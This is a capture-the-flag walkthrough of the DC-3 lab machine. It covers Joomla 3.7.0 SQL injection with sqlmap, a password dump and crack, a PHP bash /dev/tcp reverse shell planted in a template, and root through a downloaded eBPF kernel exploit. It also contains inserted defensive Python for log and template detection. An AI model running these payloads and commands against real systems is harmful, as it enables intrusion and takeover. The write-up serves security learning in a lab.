Host discovery
During the setup of the DC-3 machine I hit a small snag: the VM could not obtain an IP address. From explanations by more experienced people online, the cause should be a mismatched network interface, so I used the Linux rescue mode to edit the interface configuration, restarted the network service and rebooted, and the VM then got its IP address. Once I finish this machine I will add a tutorial for that.
Using netdiscover, the command finds the target machine at 192.168.234.178.
Port scanning
Using Nmap:
root@kali:~/桌面# nmap -sS -A -p 1-65535 192.168.234.178 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-08 15:02 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.178
Host is up (0.00055s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.178
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.234.178:80/
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.234.178:80/index.php/2-uncategorised/1-welcome
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.234.178:80/index.php/component/users/?view=reset&Itemid=101
| Form id: user-registration
| Form action: /index.php/component/users/?task=reset.request&Itemid=101
|
| Path: http://192.168.234.178:80/index.php/component/users/?view=reset&Itemid=101
| Form id: login-form
| Form action: /index.php/component/users/?Itemid=101
|
| Path: http://192.168.234.178:80/index.php
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.234.178:80/index.php/component/users/?view=remind&Itemid=101
| Form id: user-registration
| Form action: /index.php/component/users/?task=remind.remind&Itemid=101
|
| Path: http://192.168.234.178:80/index.php/component/users/?view=remind&Itemid=101
| Form id: login-form
| Form action: /index.php/component/users/?Itemid=101
|
| Path: http://192.168.234.178:80/index.php/2-uncategorised
| Form id: login-form
|_ Form action: /index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /administrator/manifests/files/joomla.xml: Joomla version 3.7.0
| /language/en-GB/en-GB.xml: Joomla version 3.7.0
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /bin/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /libraries/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.0.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2017-8917:
| VULNERABLE:
| Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2017-8917
| Risk factor: High CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
| An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
| to execute aribitrary SQL commands via unspecified vectors.
|
| Disclosure date: 2017-05-17
| Extra information:
| User: root@localhost
| References:
| https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
| vulners:
| Apache httpd 2.4.18:
| HTTPD:F564BBA32AA088833DA032B7EB77CA29 7.5 https://vulners.com/httpd/HTTPD:F564BBA32AA088833DA032B7EB77CA29
MAC Address: 00:0C:29:15:DC:FE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.234.178
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 365.77 seconds
From the scan results, the target machine only has port 80 open. The CMS is Joomla, which has an injection vulnerability, CVE-2017-8917.
CVE-2017-8917
This vulnerability affects every website running Joomla 3.7 or earlier versions of the CMS. An attacker can use it to read database contents, including user data and session data. With that data, the attacker can use a session to log in to the site backend, view sensitive information, and even change the original password.
In Kali, run searchsploit joomla to look for usable exploits; the result shows that Joomla has far too many vulnerabilities, a dizzying list.
Better to search on GitHub instead; searchsploit's output does not show the CVE either, which is not very direct.
Fortunately we found the Exploit-DB ID of CVE-2017-8917 there, so we can do the following with the command:
searchsploit joomla | grep 42033
Then save the exploit locally with the following command:
searchsploit joomla -m exploits/php/webapps/42033.txt
Look at how to use it:
root@kali:~/桌面# cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Looks like we need sqlmap. Command used:
sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
This gives the following databases:
[16:16:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[16:16:18] [INFO] fetching database names
[16:16:18] [INFO] used SQL query returns 5 entries
[16:16:18] [INFO] retrieved: 'information_schema'
[16:16:18] [INFO] retrieved: 'joomladb'
[16:16:18] [INFO] retrieved: 'mysql'
[16:16:18] [INFO] retrieved: 'performance_schema'
[16:16:18] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
Next, focus on joomladb:
sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
We see #__users. For a table name containing special characters like this, wrap it in single quotes when querying its columns.
Query the columns of the table:
sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
With username and password in hand the rest is easy; just dump them.
Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
From the above, we crack the password with john, which finally yields snoopy.
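As an added example from the defender's side (not part of the original write-up or of EDB-42033): a Python scanner that runs over Apache access-log lines and flags com_fields requests whose list[...] parameter carries the SQL fragments shown above (the updatexml marker and the CASE WHEN / FLOOR(RAND shapes sqlmap injects). The log lines are constructed samples and the log format is assumed to be Apache's combined format.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Apache combined-log prefix; only the client, request target and status are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# SQL fragments seen in CVE-2017-8917 probes: the updatexml marker from EDB-42033 and
# the CASE WHEN / FLOOR(RAND / SLEEP shapes sqlmap injects into list[fullordering].
SQLI_TOKENS = re.compile(
    r'updatexml|extractvalue|case\s+when|floor\(rand|information_schema|sleep\(|benchmark\(|select\b.*\bfrom\b',
    re.I)

def classify_request(target):
    """Return 'param: token' when a com_fields list[...] parameter carries SQL, else None."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)  # percent-decodes keys and values
    if qs.get('option') != ['com_fields']:
        return None
    for key, values in qs.items():
        # The CVE was in list[fullordering]; checking every list[...] key is the conservative choice.
        if not key.startswith('list['):
            continue
        for value in values:
            m = SQLI_TOKENS.search(unquote_plus(value))  # second decode catches double-encoded probes
            if m:
                return f"{key}: {m.group(0)}"
    return None

def scan_log(lines):
    """Return (client_ip, status, reason) for each line that looks like a com_fields injection."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            reason = classify_request(m.group('target'))
            if reason:
                alerts.append((m.group('ip'), m.group('status'), reason))
    return alerts

# Constructed sample log: two probes from the scanning host, two legitimate requests.
SAMPLE_LOG = """\
192.168.234.151 - - [08/Feb/2020:16:16:18 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%27 HTTP/1.1" 500 1532 "-" "Mozilla/5.0"
192.168.234.151 - - [08/Feb/2020:16:16:19 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=%28CASE%20WHEN%20%281573%3D1573%29%20THEN%201573%20ELSE%201573%2A%28SELECT%201573%20FROM%20DUAL%20UNION%20SELECT%209674%20FROM%20DUAL%29%20END%29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.234.10 - - [08/Feb/2020:16:20:01 +0800] "GET /index.php/2-uncategorised/1-welcome HTTP/1.1" 200 8016 "-" "Mozilla/5.0"
192.168.234.10 - - [08/Feb/2020:16:21:05 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for ip, status, reason in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} HTTP {status} -> {reason}")
```

A 500 on the first probe is itself a useful signal: the single quote broke the ORDER BY clause before any data was extracted.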
Logging in to the website
The site's main page tells us there is only one flag, and that we must obtain root privileges to get it. Whatever, let's get going!
Getting the flag
We log in to the site with the account and password.
After going through the whole site without finding anything exploitable, let's look for the admin backend instead, using Kali's built-in dirb.
root@kali:~/桌面# dirb http://192.168.234.178/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Feb 8 20:27:29 2020
URL_BASE: http://192.168.234.178/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.234.178/ ----
==> DIRECTORY: http://192.168.234.178/administrator/
==> DIRECTORY: http://192.168.234.178/bin/
==> DIRECTORY: http://192.168.234.178/cache/
==> DIRECTORY: http://192.168.234.178/components/
==> DIRECTORY: http://192.168.234.178/images/
==> DIRECTORY: http://192.168.234.178/includes/
Found the backend address http://192.168.234.178/administrator/ and logged in.
This CMS is very similar to WordPress: find where templates are edited, and modifying a template file is enough to exploit it.
What comes to mind here is writing a reverse shell in PHP.
First we find the template editing location, as follows:
Reverse shell
Edit the file index.php:
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.234.151/7777 0>&1' ");
?>
After saving, start a listener in Kali with the command:
nc -lvp 7777
Once the listener is up, just visit index.php.
Now we have a shell.
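As an added defensive example (not part of the original write-up): a small Python integrity check for the templates directory, which is the path the reverse shell above took onto the box. It snapshots SHA-256 hashes of the template PHP files at deploy time, reports files that changed or disappeared, and scans the changed ones for the constructs the payload relies on. The template name protostar, the ATTACKER_IP placeholder and the sample file contents are constructed assumptions.

```python
import hashlib
import os
import re
import tempfile

# Constructs that should never appear in a template's index.php; the payload on this
# page relies on system() plus a bash /dev/tcp redirect.
SUSPICIOUS = [
    (re.compile(r'\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(', re.I), 'command execution'),
    (re.compile(r'/dev/tcp/\S+'), 'bash /dev/tcp redirect'),
    (re.compile(r'\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|str_rot13)', re.I), 'obfuscated eval'),
]

def scan_php_source(src):
    """Return one finding per matching pattern, e.g. 'command execution: system('."""
    findings = []
    for pattern, label in SUSPICIOUS:
        m = pattern.search(src)
        if m:
            findings.append(f"{label}: {m.group(0)}")
    return findings

def snapshot(root):
    """Map each .php file under root (relative path) to its SHA-256 hex digest."""
    digest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith('.php'):
                path = os.path.join(dirpath, name)
                with open(path, 'rb') as fh:
                    digest[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digest

def compare(baseline, current):
    """Files whose hash differs from (or is new since) the baseline, and files that vanished."""
    changed = sorted(k for k, v in current.items() if baseline.get(k) != v)
    removed = sorted(k for k in baseline if k not in current)
    return changed, removed

# Constructed samples: a benign template stub and the page's payload with a placeholder listener IP.
CLEAN = "<?php\ndefined('_JEXEC') or die;\necho $this->baseurl;\n?>\n"
PAYLOAD = "<?php\nsystem(\"bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/7777 0>&1'\");\n?>\n"

if __name__ == '__main__':
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, 'templates', 'protostar')  # assumed template name
        os.makedirs(tpl)
        with open(os.path.join(tpl, 'index.php'), 'w') as fh:
            fh.write(CLEAN)
        baseline = snapshot(root)  # taken at deploy time
        with open(os.path.join(tpl, 'index.php'), 'w') as fh:
            fh.write(PAYLOAD)  # what the template editor wrote
        changed, removed = compare(baseline, snapshot(root))
        for rel in changed:
            with open(os.path.join(root, rel)) as fh:
                print(rel, scan_php_source(fh.read()))
```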
Getting an interactive shell
Use the command python -c 'import pty;pty.spawn("/bin/bash")'
Getting root
Look for files with the SUID bit set: find / -user root -perm -4000 -print 2>/dev/null
But nothing exploitable turned up. This time it is probably testing kernel privilege escalation, so use uname -a to check the Linux kernel.
www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
Then use searchsploit to look for an exploit.
root@kali:~# searchsploit linux 4.4.0-21
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x6 | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubun | exploits/linux/local/47170.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 | exploits/linux/local/44300.c
--------------------------------------- ----------------------------------------
...After trying for ages, still no success.
Then I tried CVE-2017-16995, which did not work either.
After reading an expert's write-up, I learned that the escalation uses a Linux denial-of-service vulnerability.
An exploit that puts all this together is in exploit.tar. Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
This exploit was tested on a Ubuntu 16.04 Desktop system.
Download it directly to the target with wget: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
----------------------------------------------------------------
tar -zxvf exploit.tar
gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now
www-data@DC-3:/var/www/html/39772$ tar -xvf exp
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
-----------------------------------------------------------------
cd ebpf_mapfd_doubleput_exploit/
./compile.sh // compile directly with the shell script; the warnings below appear but do not matter.
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
------------------------------------------------------------------
Next comes the privilege escalation.
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
id
id
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
Completing this machine was fairly tough. This was my first time seeing kernel privilege escalation like this; I still need to gain more experience.